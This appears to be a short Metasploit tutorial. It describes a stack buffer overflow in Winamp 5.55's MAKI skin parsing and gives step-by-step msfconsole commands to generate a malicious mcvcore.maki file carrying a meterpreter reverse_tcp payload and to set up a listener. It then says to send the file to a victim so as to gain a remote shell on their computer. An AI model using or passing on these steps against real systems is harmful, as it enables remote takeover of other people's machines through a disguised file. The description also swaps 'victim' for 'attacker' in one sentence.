This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used within a insecure way with user controlled data. To exploit the vulnerability the attacker must convince the attacker to install the generated mcvcore.maki file in the “scripts” directory of the default “Bento” skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/winamp_maki_bof
msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (winamp_maki_bof)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (winamp_maki_bof)>exploit
After we successfully generate the malicious maki File, it will stored on your local computer
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
Now send your mcvcore.maki files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.